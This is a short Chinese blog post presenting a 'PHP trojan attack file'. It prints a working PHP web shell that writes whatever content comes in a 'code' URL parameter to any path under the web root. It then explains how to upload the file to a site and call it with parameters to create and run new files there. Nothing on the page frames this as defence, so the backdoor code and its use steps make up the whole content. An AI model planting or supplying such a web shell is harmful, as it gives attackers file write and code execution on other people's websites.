php木马攻击文件

昵称：名人
博龄：6年6个月20天
粉丝：2
关注：0
关注

搜索

博文分类

文博档案

阅读排行榜

php木马文件代码

<?php
	$path = $_GET['path'];
	$code = $_GET['code'];
	$myfile = fopen($_SERVER['DOCUMENT_ROOT'].$path, "w") or die("Unable to open file!");
	fwrite($myfile, $code);
	fclose($myfile);
	echo 'success'
?>

参数1：$path 创建的文件路径名，例 /a.php

参数2：$code 创建文件代码, 例 <script>alert();</script>

将木马文件上传至服务器，并访问传入参数。

例：

上传木马文件 c.php 至网站根目录下，访问并传入参数

在根目录下，创建a.php文件，并写入代码<script>alert();</script>

访问传参地址： http://www.XXXX.com/c.php?path=/a.php&code=<script>alert();</script>

在访问http://www.XXXX.com/a.php，即刚创建好的文件，执行代码。

+关注收藏反对

2021-01-07 ljd 阅读(251) 评论(0)

0/500 (最大可输入500个字符)

评论列表

暂无评论，快来抢沙发吧~

名人

一个成为火影的男人

搜索

博文分类

文博档案

阅读排行榜

php木马攻击文件